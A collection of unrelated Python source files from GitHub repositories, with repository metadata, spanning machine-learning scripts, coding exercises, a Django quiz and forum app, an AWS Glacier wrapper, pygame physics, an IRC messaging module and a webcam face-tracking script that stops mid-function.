X.append([mcg,gvh,lip,chg,acc,alm1,alm2])\n y.append(label)\n\n\n# # Membagi Data Testing dan Data Training\nfrom sklearn.model_selection import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3)\n\n\n# # Training Model\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.neighbors import KNeighborsClassifier\n\ncls = GaussianNB()\ncls.fit(X_train, y_train)\n\nclf = KNeighborsClassifier(n_neighbors=3)\nclf.fit(X_train, y_train)\n\n\n# # Testing Model\nfor test in X_test:\n result = cls.predict([test])\n print(\"nilai {nilai} memiliki label {label}\".format(nilai=test,label=result[0]))\n\nfor test in X_test:\n result = clf.predict([test])\n print(\"nilai {nilai} memiliki label {label}\".format(nilai=test,label=result[0]))\n\n\n# # Akurasi\nprint(\"Akurasi Prediksi : \",cls.score(X_test,y_test))\n\nprint(\"Akurasi Prediksi : \",clf.score(X_test,y_test))","repo_name":"SistemCerdasSquad/naivebayesdanknn","sub_path":"Naive Bayes Classiffier dan KNN.py","file_name":"Naive Bayes Classiffier dan KNN.py","file_ext":"py","file_size_in_byte":1169,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42550160044","text":"import scanpy as sc\nimport numpy as np\nimport pandas as pd\nimport os\nfrom collections import Counter\n\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\nfrom sklearn.svm import SVC\nfrom sklearn.model_selection import StratifiedKFold\nfrom sklearn.model_selection import permutation_test_score\n\nsc.settings.verbosity = 3 # verbosity: errors (0), warnings (1), info (2), hints (3)\nsc.settings.set_figure_params(dpi=80, facecolor='white')\n\ncd56 = sc.read_h5ad('cd56.h5ad')\ncd56 = cd56[cd56.obs['meta_tissue_new']!='Other tissue']\nt2t = {'Blood':1, 'Normal':0, 'Tumor':0}\n\nchoose56 = np.random.choice(cd56.obs['cellID'],2000,replace=False)\n\ncd56_choose = cd56[cd56.obs['cellID'].isin(choose56)]\ntissue56=[t2t[i] for i in cd56_choose.obs['meta_tissue_new'].tolist()]\n\nclf = SVC(kernel=\"rbf\", random_state=7)\ncv = StratifiedKFold(2, shuffle=True, random_state=0)\n\nscore_rgs1, perm_scores_rgs1, pvalue_rgs1 = permutation_test_score(\nclf, cd56_choose[:,['RGS1']].X.todense(), tissue56, scoring=\"accuracy\", cv=cv,n_permutations=1000\n)\n\nscore_cd69, perm_scores_cd69, pvalue_cd69 = permutation_test_score(\nclf, cd56_choose[:,['CD69']].X.todense(), tissue56, scoring=\"accuracy\", cv=cv,n_permutations=1000\n)\n\n\nfig, ax = plt.subplots()\nax.hist(perm_scores_rgs1, bins=20, density=True)\nax.axvline(score_rgs1, ls=\"--\", color=\"r\")\nscore_label = f\"Score on original\\ndata: {score_rgs1:.2f}\\n(p-value: {pvalue_rgs1:.3f})\"\nax.text(0.56, 92, score_label, fontsize=12)\nax.set_xlabel(\"Accuracy score (RGS1)\")\nax.set_ylabel(\"Probability\")\nplt.grid(None)\n\nplt.savefig('CD56_RGS1.pdf')\nplt.show()\n\n\nfig, ax = plt.subplots()\nax.hist(perm_scores_cd69, bins=20, density=True,color='orange')\nax.axvline(score_cd69, ls=\"--\", color=\"r\")\nscore_label = f\"Score on original\\ndata: {score_cd69:.2f}\\n(p-value: {pvalue_cd69:.3f})\"\nax.text(0.55, 82, score_label, fontsize=12)\nax.set_xlabel(\"Accuracy score (CD69)\")\nax.set_ylabel(\"Probability\")\nplt.grid(None)\n\nplt.savefig('CD56_CD69.pdf')\nplt.show()","repo_name":"TangFei965/pan-NK","sub_path":"permutation.py","file_name":"permutation.py","file_ext":"py","file_size_in_byte":1976,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"37"} +{"seq_id":"23863940546","text":"def 
multitask(initial_list: list[int]):\n    \"\"\"The program receives a list as input.\n    :return the list in which\n    - the second element is replaced with 17\n    - 4, 5, 6 are appended to the end of the list\n    - the first element is removed\n    - every element is doubled (i.e. the same list twice, merged into one)\n    - the number 25 is inserted at index 3\n    all actions must be performed in this order\"\"\"\n    del initial_list[1]\n    initial_list.insert(1, 17)\n    initial_list += [4, 5, 6]\n    del initial_list[0]\n    new_list = []\n    for element in initial_list:\n        new_list.append(element)\n        new_list.append(element)\n    new_list.insert(3, 25)\n    return new_list\n\n\ndef rearrange_min_and_max(initial_list: list[int]):\n    \"\"\"The program receives a list of numbers as input.\n    :return the list with the maximum and minimum numbers swapped\n    * remember (a, b = b, a)\"\"\"\n    index_min = initial_list.index(min(initial_list))\n    index_max = initial_list.index(max(initial_list))\n    initial_list[index_min], initial_list[index_max] = initial_list[index_max], initial_list[index_min]\n    return initial_list\n\n\ndef amount_of_articles(text: str):\n    \"\"\"The program receives a text as input.\n    :return the number of articles a, an, the in the text. Articles may be in any letter case\"\"\"\n    prep_list = ['article' for element in text.lower().split() if element in ['a', 'an', 'the']]\n    return len(prep_list)\n\n\ndef clear_comments(text: str):\n    \"\"\"The program receives a text as input. Lines are separated by the newline character.\n    Some lines end with comments (comments start with the # symbol)\n    :return the text with the comments removed\"\"\"\n    cleaned_lines = [line.split('#', 1)[0].rstrip() for line in text.split('\\n')]\n    return '\\n'.join(cleaned_lines)\n\n\ndef sort_all_digits(text: str):\n    \"\"\"The program receives a text that contains digits.\n    :return a string of the sorted digits, joined by a comma and a space\"\"\"\n    list_of_number = []\n    for element in text:\n        if element.isdigit():\n            list_of_number.append(element)\n    list_of_number.sort()\n    return \", \".join(list_of_number)\n\n\ndef length_of_words(text: str):\n    \"\"\"The program receives a text as input.\n    :return a list in which each element is the length of one word\"\"\"\n    new_list = [len(word) for word in text.split()]\n    return new_list\n\n\ndef filter_words(text: str):\n    \"\"\"The program receives a text as input.\n    :return a list with only the words longer than 5 characters\"\"\"\n    return [word for word in text.split() if len(word) > 5]\n\n\ndef palindomes_in_range(lower_limit: int, upper_limit: int):\n    \"\"\"The program receives range limits as input.\n    :return a list of all numeric palindromes within these limits\"\"\"\n    numbers = [str(number) for number in range(lower_limit, upper_limit + 1)]\n    return [number for number in numbers if number == number[::-1]]\n\n\ndef get_all_digits(text: str):\n    \"\"\"The program receives a text as input.\n    :return a list of the digits from the text\"\"\"\n    return [symbol for symbol in text if symbol.isdigit()]\n","repo_name":"MarkoYaminsky/giraffe-lessons","sub_path":"lessons/lists_pt2/іванка.py","file_name":"іванка.py","file_ext":"py","file_size_in_byte":4136,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"20467347396","text":"import logging\nfrom boto.glacier.layer2 import Layer2\nimport time\n\n\nclass Amazon:\n    def __init__(self, aws_access_key_id, 
aws_secret_access_key, region_name):\n        self.log = logging.getLogger('__main__')\n        logging.getLogger('boto').setLevel(logging.CRITICAL)\n        self.glacier_client = Layer2(aws_access_key_id=aws_access_key_id, aws_secret_access_key=aws_secret_access_key,\n                                     region_name=region_name)\n\n    def upload_file(self, vault_name, description, path):\n        if self.is_vault_exist(vault_name):\n            vault = self.glacier_client.get_vault(vault_name)\n        else:\n            vault = self.create_vault(vault_name)\n        archive_id = vault.concurrent_create_archive_from_file(path, description, part_size=4194304)\n        self.log.debug('File \"{0}\" upload successful. Archive id: \"{1}\"'.format(path, archive_id))\n        return archive_id\n\n    def create_vault(self, vault_name):\n        vault = self.glacier_client.create_vault(name=vault_name)\n        return vault\n\n    def is_vault_exist(self, vault_name):\n        vaults = [i.name for i in self.glacier_client.list_vaults()]\n        if vault_name in vaults:\n            return True\n        else:\n            return False\n\n    def get_inventory(self, vault_name, sleep_interval=1200):\n        vault = self.glacier_client.get_vault(vault_name)\n        inventory_job_id = vault.retrieve_inventory()\n        job = vault.get_job(inventory_job_id)\n        while not job.completed:\n            time.sleep(sleep_interval)\n            job = vault.get_job(inventory_job_id)\n        inventory = job.get_output()\n        return inventory\n\n    def download_file(self, vault_name, archive_id, dest, sleep_interval=1200):\n        vault = self.glacier_client.get_vault(vault_name)\n        job = vault.retrieve_archive(archive_id)\n        job_id = job.id\n        while not job.completed:\n            time.sleep(sleep_interval)\n            job = vault.get_job(job_id)\n        download_result = job.download_to_file(dest)\n        return download_result\n\n    def delete_archive(self, vault_name, archive_id):\n        vault = self.glacier_client.get_vault(vault_name)\n        vault.delete_archive(archive_id)\n        self.log.debug('Successfully removed archive \"{0}\" from vault \"{1}\"'.format(archive_id, vault.name))\n","repo_name":"vault-the/ebt","sub_path":"ebt_cloud/amazon.py","file_name":"amazon.py","file_ext":"py","file_size_in_byte":2317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"}{"seq_id":"37339428294","text":"\"\"\"\nCourtesy of https://github.com/matthew-brett/transforms3d\nBlender doesn't allow installation of custom modules, so I had to copy\n\"\"\"\nimport math\n\nimport numpy as np\n\n# Not my code\n# pylint: disable=invalid-name\n\n_NEXT_AXIS = [1, 2, 0, 1]\n\n_AXES2TUPLE = {\n    \"sxyz\": (0, 0, 0, 0),\n    \"sxyx\": (0, 0, 1, 0),\n    \"sxzy\": (0, 1, 0, 0),\n    \"sxzx\": (0, 1, 1, 0),\n    \"syzx\": (1, 0, 0, 0),\n    \"syzy\": (1, 0, 1, 0),\n    \"syxz\": (1, 1, 0, 0),\n    \"syxy\": (1, 1, 1, 0),\n    \"szxy\": (2, 0, 0, 0),\n    \"szxz\": (2, 0, 1, 0),\n    \"szyx\": (2, 1, 0, 0),\n    \"szyz\": (2, 1, 1, 0),\n    \"rzyx\": (0, 0, 0, 1),\n    \"rxyx\": (0, 0, 1, 1),\n    \"ryzx\": (0, 1, 0, 1),\n    \"rxzx\": (0, 1, 1, 1),\n    \"rxzy\": (1, 0, 0, 1),\n    \"ryzy\": (1, 0, 1, 1),\n    \"rzxy\": (1, 1, 0, 1),\n    \"ryxy\": (1, 1, 1, 1),\n    \"ryxz\": (2, 0, 0, 1),\n    \"rzxz\": (2, 0, 1, 1),\n    \"rxyz\": (2, 1, 0, 1),\n    \"rzyz\": (2, 1, 1, 1),\n}\n\n_TUPLE2AXES = dict((v, k) for k, v in _AXES2TUPLE.items())\n\n\ndef euler2mat(ai, aj, ak, axes=\"sxyz\"):\n    \"\"\"Return rotation matrix from Euler angles and axis sequence.\n\n    Parameters\n    ----------\n    ai : float\n        First rotation angle (according to `axes`).\n    aj : float\n        Second rotation angle (according to `axes`).\n    ak : float\n        Third rotation angle (according to `axes`).\n    axes : str, optional\n        Axis specification; one of 24 axis sequences as string or encoded\n        tuple - e.g. 
``sxyz`` (the default).\n\n    Returns\n    -------\n    mat : array-like shape (3, 3) or (4, 4)\n        Rotation matrix or affine.\n\n    Examples\n    --------\n    >>> R = euler2mat(1, 2, 3, 'syxz')\n    >>> np.allclose(np.sum(R[0]), -1.34786452)\n    True\n    >>> R = euler2mat(1, 2, 3, (0, 1, 0, 1))\n    >>> np.allclose(np.sum(R[0]), -0.383436184)\n    True\n    \"\"\"\n    try:\n        firstaxis, parity, repetition, frame = _AXES2TUPLE[axes]\n    except (AttributeError, KeyError):\n        _TUPLE2AXES[axes]  # validation\n        firstaxis, parity, repetition, frame = axes\n\n    i = firstaxis\n    j = _NEXT_AXIS[i + parity]\n    k = _NEXT_AXIS[i - parity + 1]\n\n    if frame:\n        ai, ak = ak, ai\n    if parity:\n        ai, aj, ak = -ai, -aj, -ak\n\n    si, sj, sk = math.sin(ai), math.sin(aj), math.sin(ak)\n    ci, cj, ck = math.cos(ai), math.cos(aj), math.cos(ak)\n    cc, cs = ci * ck, ci * sk\n    sc, ss = si * ck, si * sk\n\n    M = np.eye(3)\n    if repetition:\n        M[i, i] = cj\n        M[i, j] = sj * si\n        M[i, k] = sj * ci\n        M[j, i] = sj * sk\n        M[j, j] = -cj * ss + cc\n        M[j, k] = -cj * cs - sc\n        M[k, i] = -sj * ck\n        M[k, j] = cj * sc + cs\n        M[k, k] = cj * cc - ss\n    else:\n        M[i, i] = cj * ck\n        M[i, j] = sj * sc - cs\n        M[i, k] = sj * cc + ss\n        M[j, i] = cj * sk\n        M[j, j] = sj * ss + cc\n        M[j, k] = sj * cs - sc\n        M[k, i] = -sj\n        M[k, j] = cj * si\n        M[k, k] = cj * ci\n    return M\n","repo_name":"pehala/animationCombiner","sub_path":"animationCombiner/utils/transform.py","file_name":"transform.py","file_ext":"py","file_size_in_byte":2884,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"}{"seq_id":"45142034227","text":"S = str(input())\n\nfor i in range(97,123) :\n    print(S.find(chr(i)),end = \" \")\n    \n## find() vs index()\n\n## In common\n##'variable.find(char_to_find)' / 'variable.index(char_to_find)' \n\n## Differences\n## find() returns -1 when the character to find is not present.\n## index() raises a ValueError when the character to find is not present.\n","repo_name":"kwonhyeongju/Baekjoon_Python","sub_path":"백준/Bronze/05.문자열/10809. 
알파벳 찾기 ##/알파벳 찾기.py","file_name":"알파벳 찾기.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25906807151","text":"# -*-coding:utf-8-*-\nfrom forum import models\nfrom django.contrib.auth.models import Group\n\n\nclass TopicsNavItems:\n items = {\n 'default': '默认',\n 'newest': '最新',\n 'best': '精品',\n 'inner_task': '版务',\n 'rank_list': '排行',\n 'rank_user': '人物',\n 'users': '成员',\n 'update': '刷新',\n 'new': '发帖',\n }\n\n def __str__(self):\n return self.items\n\n\nclass TopicsTableHeader:\n header = {\n 'title': '标题',\n 'author': '作者',\n 'access_count': '点击',\n 'reply_count': '回复',\n 'created_at': '创建时间',\n }\n\n def __str__(self):\n return self.header\n\n\ndef topic_get_reply_count(topic):\n messages = models.ForumMessage.objects.filter(topic=topic)\n return len(messages)\n","repo_name":"chindragon/redot.repository","sub_path":"redot/forum/blocks/topicclass.py","file_name":"topicclass.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8015194826","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution:\n def detectCycle(self, head: Optional[ListNode]) -> Optional[ListNode]:\n d = {}\n count = 0\n while head:\n if head in d:\n return head\n else:\n d[head] = count\n count += 1\n head = head.next\n return None\n ","repo_name":"Panfil-spb/LeetCode","sub_path":"142-linked-list-cycle-ii/142-linked-list-cycle-ii.py","file_name":"142-linked-list-cycle-ii.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27043743816","text":"from __future__ import annotations\n\nimport pygame as pg\nfrom ..assets.sprites import Sprite\n\n\nclass Player:\n \"\"\"\n Implement a player in the game using Verlet's integration.\n \"\"\"\n def __init__(self, sprite: Sprite, pos: pg.Vector2):\n self.sprite = sprite\n self.pos = pos\n self.old_pos = self.pos.copy()\n self.gravity = pg.Vector2(0, 10)\n\n @property\n def pos(self) -> pg.Vector2:\n return self.sprite.pos\n\n @pos.setter\n def pos(self, value: pg.Vector2):\n self.sprite.pos = value\n\n @property\n def rect(self):\n return self.sprite.rect\n\n @rect.setter\n def rect(self, value: pg.Rect):\n self.sprite.rect = value\n\n def flip_pos(self):\n old_pos = self.pos.copy()\n self.pos = self.pos + (self.pos - self.old_pos)\n self.old_pos = old_pos\n\n def update(self, dt: float):\n self.flip_pos()\n self.pos = self.pos + (self.gravity * dt)\n self.sprite.step_by(int(dt))\n\n def draw(self, screen: pg.Surface, camera: pg.Vector2 | None = None):\n self.sprite.draw(screen, camera)\n\n def stop(self):\n self.old_pos = self.pos.copy()\n\n def resolve_collision(self, other: pg.Rect) -> tuple[bool, int]:\n if not self.rect.colliderect(other):\n return False, -1\n\n left_fix = other.left - self.rect.right + 1\n right_fix = self.rect.left - other.right - 1\n top_fix = other.top - self.rect.bottom + 1\n bottom_fix = self.rect.top - other.bottom - 1\n fix = min((left_fix, 0), (top_fix, 1), (right_fix, 2), (bottom_fix, 3), key=lambda x: abs(x[0]))\n if fix[1] == 0:\n self.pos.x += fix[0]\n elif fix[1] == 1:\n self.pos.y += fix[0]\n elif fix[1] == 2:\n self.pos.x -= fix[0]\n elif fix[1] == 3:\n self.pos.y -= fix[0]\n\n return True, fix[1]\n\n\n__all__ = 
[\"Player\"]\n","repo_name":"gresm/pygame-summer-2022","sub_path":"game/environment/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":1909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28773472999","text":"a = int(input())\ni = 0\nsum = 0\n# for i in range(0,a):\n# i += 1\n# sum += i\n# if sum >= a:\n# print(sum)\n# break\nwhile True:\n i += 1\n sum += i\n if sum >= a:\n break\nprint(sum)","repo_name":"jinjaehyuk/codeup100","sub_path":"6086.py","file_name":"6086.py","file_ext":"py","file_size_in_byte":215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1438136685","text":"from oslo_config import cfg\n\n\nexecutor_opts = [\n cfg.StrOpt('agent_trigger_metadata_key',\n default='kongming-vcpu-pinning',\n help='The key to be used to informing kongming for '\n 'vcpu pinning'),\n cfg.IntOpt('update_resources_interval',\n default=60,\n help=_('Interval between syncing the resources from underlying '\n 'hypervisor, in seconds.')),\n]\n\n\ndef register_opts(conf):\n conf.register_opts(\n executor_opts, group=\"agent\")\n","repo_name":"ZhengZhenyu/KongMing","sub_path":"kongming/conf/agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"8623263941","text":"import os\nimport json\nimport re\n\n__all__ = ['readexif', 'decode_duration', 'format_duration', 'create_video_thumbnail']\n\n\ndef readexif( f, tags ):\n tags = \" \".join([\"-%s\" % t for t in tags])\n cmd = '/usr/bin/exiftool -j -f %s \"%s\"' % (tags, f)\n\n p = os.popen(cmd, \"r\")\n l = p.readlines()\n exifoutput = \"\".join(l)\n\n metadata = json.loads(exifoutput)\n return metadata[0]\n\ndurationpattern = re.compile(r\"([0-9]+:)*[0-9]+(\\.[0-9]+)?\")\n\n\ndef decode_duration( s ):\n if s:\n m = durationpattern.search( s )\n\n if m:\n t = m.group(0).split(\".\")\n if len(t) > 1:\n frames = int(t[1])\n else:\n frames = 0\n ls = t[0].split(\":\")\n ls = [int(l) for l in ls]\n ls.reverse()\n\n secs = 0\n f = 1\n for l in ls:\n secs += l * f\n f = f * 60\n\n return (secs, int(frames))\n\n return None\n\n\ndef format_duration( secs ):\n tmp = secs\n secs = tmp % 60\n tmp = (tmp - secs) / 60\n mins = tmp % 60\n hours = (tmp - mins) / 60\n\n return \"%0*d:%0*d:%0*d\" % (2, hours, 2, mins, 2, secs)\n\n\ndef create_video_thumbnail( vidfile, duration, output='', name=None ):\n (_root, f) = os.path.split(vidfile)\n (base, _ext) = os.path.splitext(f)\n\n if name:\n outputfile = os.path.join(output, name + \".png\")\n else:\n outputfile = os.path.join(output, base + \".png\")\n cmd = 'ffmpeg -i \"%s\" -r 1 -ss %s -t 00:00:01 -f image2 \"%s\"' % (vidfile, 1 if duration <= 10 else 10, outputfile )\n p = os.popen(cmd, \"r\")\n p.readlines()\n\n return outputfile\n","repo_name":"djangoplicity/djangoplicity","sub_path":"djangoplicity/utils/videothumbnails.py","file_name":"videothumbnails.py","file_ext":"py","file_size_in_byte":1647,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"25070080058","text":"def quicksort(array):\n if len(array)<2:\n return array\n else:\n pivo = array[0]\n smaller_numbers = [i for i in array[1:] if i <= pivo]\n bigger_number = [i for i in array[1:] if i > pivo]\n return (quicksort(smaller_numbers)) + [pivo] + (quicksort(bigger_number))\n\narray = [ 4, 6, 6, 33, 60, 2, 10, 9] \nprint 
(quicksort(array))\n\n\n\ndef bubblesort(array, n):\n aux = 1\n while(aux):\n aux = 0\n for i in range(n-1):\n if array[i] > array[i+1]:\n array[i], array[i+1] = array[i+1], array[i]\n aux = 1\n\n return array\narr = [1, 33, 11, 22, 9, 0, 34, 12]\nbubble = bubblesort(arr, len(arr) )\nprint(bubble)\n\n \n\n","repo_name":"AriRVasc/EntendendoAlgoritmos","sub_path":"Quicksort/quicksort.py","file_name":"quicksort.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42574033797","text":"import tkinter as tk\nimport start_page as sp\nfrom languages import IP_BACK, IP_INFO, LANG\n\n\nclass InfoPage(tk.Frame):\n\n def __init__(self, parent, controller):\n tk.Frame.__init__(self, parent)\n label_info = tk.Label(self, text=IP_INFO[LANG])\n label_info.pack()\n back_btn = tk.Button(self, text=IP_BACK[LANG], command=lambda: controller.show_frame(sp.StartPage))\n back_btn.pack(side=\"bottom\")","repo_name":"Phantomo/measuring_instrument","sub_path":"info_page.py","file_name":"info_page.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36329462325","text":"from django.urls import reverse\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom .models import Quiz, QuizQuestion, ImageChoice, TextChoice , TextInputQuestion\n\ndef quiz_list(request):\n quizzes = Quiz.objects.all()\n context = {'quizzes': quizzes}\n return render(request, 'quiz_list.html', context)\n\ndef question_quiz_list(request, quiz_id):\n quiz = get_object_or_404(Quiz, pk=quiz_id)\n questions = QuizQuestion.objects.filter(quiz=quiz)\n\n # loop through the questions and retrieve their choices\n for question in questions:\n image_choices = question.imagechoice_set.all()\n text_choices = question.textchoice_set.all()\n text_input_question = question.textinputquestion_set.all()\n\n\n # check if the question has image choices\n if image_choices:\n question.has_image_choices = True\n question.choices = image_choices\n else:\n question.has_image_choices = False\n\n # check if the question has text choices\n if text_choices:\n question.has_text_choices = True\n question.text_choices = text_choices\n else:\n question.has_text_choices = False\n\n # check if the question has text input choices\n if text_input_question:\n question.has_text_input_question = True\n question.text_input_question = text_input_question\n else:\n question.has_text_input_question = False \n\n context = {'questions': questions, 'quiz': quiz}\n return render(request, 'question_quiz_list.html', context)\n\n\n\ndef result(request, quiz_id):\n quiz = get_object_or_404(Quiz, pk=quiz_id)\n questions = QuizQuestion.objects.filter(quiz=quiz)\n\n user_responses = {}\n score = 0\n\n if request.method == 'POST':\n for question in questions:\n user_response = request.POST.get('question_{}'.format(question.id))\n user_responses[question.id] = user_response\n if question.question_type == 'image_choice':\n correct_choice = ImageChoice.objects.filter(question=question, is_correct=True).first()\n if correct_choice is not None and user_response == str(correct_choice.id):\n score += question.score\n if question.question_type == 'text_choice':\n correct_choice = TextChoice.objects.filter(question=question, is_correct=True).first()\n if correct_choice is not None and user_response == str(correct_choice.id):\n score += question.score\n if question.question_type == 
'textinputquestion':\n                correct_answer = TextInputQuestion.objects.filter(question=question, is_correct=True).first()\n                if correct_answer is not None and user_response.lower() == correct_answer.answer_text.lower():\n                    score += question.score\n        context = {'user_responses': user_responses, 'quiz': quiz, 'score': score, 'total_questions': len(questions)}\n        return render(request, 'result.html', context)\n    else:\n        for question in questions:\n            if isinstance(question, TextInputQuestion):\n                question.field_name = 'question_{}'.format(question.id)\n            else:\n                choices = []\n                image_choices = question.imagechoice_set.all()\n                text_choices = question.textchoice_set.all()\n                if image_choices.exists():\n                    for choice in image_choices:\n                        choices.append({'id': choice.id, 'image': choice.image.url, 'is_correct': choice.is_correct})\n                elif text_choices.exists():\n                    for choice in text_choices:\n                        choices.append({'id': choice.id, 'text': choice.text, 'is_correct': choice.is_correct})\n                question.choices = choices\n\n        return render(request, 'question_quiz_list.html', {'quiz': quiz, 'questions': questions})\n","repo_name":"Nabilox101/myquiz","sub_path":"quiz/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}{"seq_id":"2245222831","text":"\"\"\"\n\n    The fabulous TikkleMod\n\n    - Login/logout phrase [x]\n    - AFK phrase [x]\n    - Fetch tikkles [x]\n\n\"\"\"\n\nimport re\nimport datetime\n\n__version__ = \"0.1a\"\n__requires__ = []\n\n\ntikkleView = chaos(\"tikkleTIKKLE\",\n    \"\"\"\n    if (doc.doctype == \"tikkle\") {\n        emit(doc.to, [doc.from, doc.msg, doc._rev, doc.time]);\n    }\n    \"\"\"\n)\ntikkleIdentityView = chaos(\"tikkleIdentityView\",\n    \"\"\"\n    if (doc.doctype == \"Identity\") {\n        emit(\"User\", doc.name);\n    }\n    \"\"\"\n)\n\n@hook('message')\n@defer.inlineCallbacks\ndef startTheTikkleFun(event):\n    if (hasIdentity(event)):\n        d = davenport.openDoc(str(event.source.identity.docid))\n        doc = yield d\n        if \"tikkle\" in doc: #XXX the database could do that for us *sigh*\n            loginRE = re.compile(doc[\"tikkle\"][\"login\"])\n            if (loginRE.match(event.content) != None):\n                event.source.message(\"User recognized - Digests!\")\n                doStuff(event)\n\ndef doStuff(event):\n    fetchTikkles(event)\n\n@defer.inlineCallbacks\ndef fetchTikkles(event):\n    entries = yield tikkleView(key=event.source.identity.docid)\n    for entry in entries[u'rows']:\n        senderDoc = davenport.openDoc(str(entry[u'value'][0]))\n        senderDoc = yield senderDoc\n        mtime = datetime.datetime.fromtimestamp(entry[u'value'][3]).strftime(\"[%d.%m|%H:%M]\")\n        event.source.message(mtime+\" <\"+str(senderDoc[u'name']+\"> \"+entry[u'value'][1]))\n        davenport.deleteDoc(str(entry[u'id']), str(entry[u'value'][2]))\n\n## Send Messages\n@hook('message',expr='^tikkle tikkle .*')\n@defer.inlineCallbacks\ndef sendMsg(event):\n    # msg = [tikkle, tikkle, recipient, message...]\n    msg = event.content.split(' ')\n    if ((msg[1] == \"tikkle\") and (hasIdentity(event))):\n        sent = False\n        tikkle = {}\n        users = yield tikkleIdentityView()\n        for user in users[u'rows']:\n            if (str(user[u'value']) == msg[2]):\n                tikkle[\"time\"] = int(datetime.datetime.now().strftime(\"%s\"))\n                tikkle[\"from\"] = event.source.identity.docid\n                tikkle[\"to\"] = user[u'id']\n                tikkle[\"msg\"] = \" \".join(msg[3:])\n                tikkle[\"doctype\"] = \"tikkle\"\n                davenport.saveDoc(tikkle)\n                #print \"[TIKKLE] SENT MESSAGE: \"+str(tikkle)\n                #event.reply(\"Brief: \"+str(tikkle))\n                sent = True\n                break\n        if sent:\n            event.source.message(\"Message successfully sent!\")\n        else:\n            
event.source.message(\"Message could not be sent!\")\n\ndef hasIdentity(event):\n return event.source.identity is not None\n","repo_name":"lehmannro/pyhkal2","sub_path":"contrib/tikkle.py","file_name":"tikkle.py","file_ext":"py","file_size_in_byte":2735,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"13244864173","text":"# pip install mss pyvirtualcam facenet_pytorch pykalman\nimport io\nimport signal\nimport time\n\nimport torch\nimport numpy as np\nimport cv2\nimport os\nimport sys\n\n\nfrom PIL import Image, ImageDraw\n\nfrom mss import mss\nimport pyvirtualcam\n\nfrom pykalman import KalmanFilter\n\nimport rembg.bg as bg\n\n# Local libs.\nimport detection\nimport anime_gan\nimport facetracking\n\nfrom pyxelate import Pyx\nimport skimage\n\n# define a video capture object\n\n\n# frame = cv2.imread(\"c:/Users/Brian/Downloads/wallace.jpg\")\n# if frame is None:\n# print(\"nope\")\n# sys.exit(1)\n# else:\n# print(\"yep\")\n\n\ndef track_faces(frame, face_observations):\n\n boxes = facetracking.detect_faces(frame)\n\n if boxes is not None and len(boxes) != 0:\n\n round_to = 1\n [x1, y1, x2, y2] = [\n int(round(x / round_to) * round_to) for x in boxes[0].tolist()\n ]\n\n percent = 0.5\n\n width = x2 - x1\n height = y2 - y1\n x1 = max(0, x1 - width * percent)\n x2 = min(frame.shape[1], x2 + width * percent)\n y1 = max(0, y1 - height * percent)\n y2 = min(frame.shape[0], y2 + height * percent)\n coords = [x1, y1, x2, y2]\n\n face_observations.append(coords)\n\n\ndef crop_face(frame):\n global face_observations\n\n try:\n face_observations\n except NameError:\n face_observations = []\n\n track_faces(frame, face_observations)\n\n # If we have a face go to that, otherwise display the entire image.\n if len(face_observations) != 0:\n obs_to_average = 5\n face_observations = face_observations[-obs_to_average:]\n [x1, y1, x2, y2] = [int(x) for x in np.average(face_observations, axis=0)]\n\n # Crop it.\n frame = frame[y1:y2, x1:x2]\n\n return frame\n\n\ndef frame_from_video(path):\n global vid_cap\n\n try:\n vid_cap\n except NameError:\n vid_cap = cv2.VideoCapture(path)\n\n if not vid_cap.isOpened():\n return None\n\n ret, frame = vid_cap.read()\n if ret:\n return frame\n return None\n\n\ndef pixelate(frame):\n global pyx_transformer\n\n downsample_by = 2 # new image will be 1/14th of the original in size\n palette = 11 # find 7 colors\n image = frame[:, :, ::-1]\n\n try:\n pyx_transformer\n except NameError:\n pyx_transformer = Pyx(factor=downsample_by, palette=palette)\n # Learn color palette\n pyx_transformer.fit(image)\n\n new_image = pyx_transformer.transform(image)\n cv_image = skimage.img_as_ubyte(new_image)\n cv_image = cv2.cvtColor(cv_image, cv2.COLOR_RGB2BGR)\n return cv_image\n\n\ndef write_frame_to_video(frame, path):\n global video_writer\n\n try:\n video_writer\n except NameError:\n video_writer = cv2.VideoWriter(\n path, cv2.VideoWriter_fourcc(*\"MJPG\"), 30, (frame.shape[1], frame.shape[0])\n )\n\n video_writer.write(frame)\n\n\ndef frame_from_web_cam():\n\n global vid\n\n try:\n vid\n except NameError:\n # Open the webcam.\n vid = cv2.VideoCapture(0)\n 